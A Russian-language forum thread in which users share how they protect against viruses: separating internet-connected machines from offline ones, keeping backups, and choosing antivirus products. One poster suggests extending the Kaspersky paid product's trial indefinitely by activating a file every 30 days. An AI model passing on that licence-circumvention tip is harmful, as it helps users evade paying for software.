Что касается разделения - я думаю, Oxenkiller имел в виду другую схему. Не "игры"-"работа", а "инет"-"всё остальное". Там, где я работаю, реализована именно она: имеется с десяток ноутов с Ubuntu (и ничем больше), подключённых к сети, а все остальные компьютеры - в пожизненном оффлайне. Всё (или практически всё) заражённое, что пытается запуститься с флешек или пойти бродить по локалке - убивается Касперским.
Я так понимаю, вам вирусы никогда комп не ломали? Раз вам не боязно.
Вся жизненно важная информация (работа, учёба) у меня имеет бэкап на каком-либо внешнем носителе. А так - да, не ломали, пару раз доставляли неприятности, но всё удавалось спасти. Я вообще верю, что комплексная защита "антивирус+работающая голова" помогает в 95% случаев. Если только вы не насолили какому-нибудь хакеру.
Manticore написал(а):
Как вы защишаетесь от вирусов? Какой антивирус по вашему лучший? А из бесплатных? Эффективно защишаться ограничением прав (как в учетке гость) ? Они мне блокировали винду и требовали смс, ломали операционку, воровали данные, блокировали доступ к сайтам и т.д. Заклебали они меня! Хочу найти действенное средство против них. Что посоветуете?
Kaspersky Internet Security 9.0.0.736. Канеш прога платная, но мона каждые 30 дней активировать файл, который продлевает пробную версию)))
У меня norton 360, с компом купил)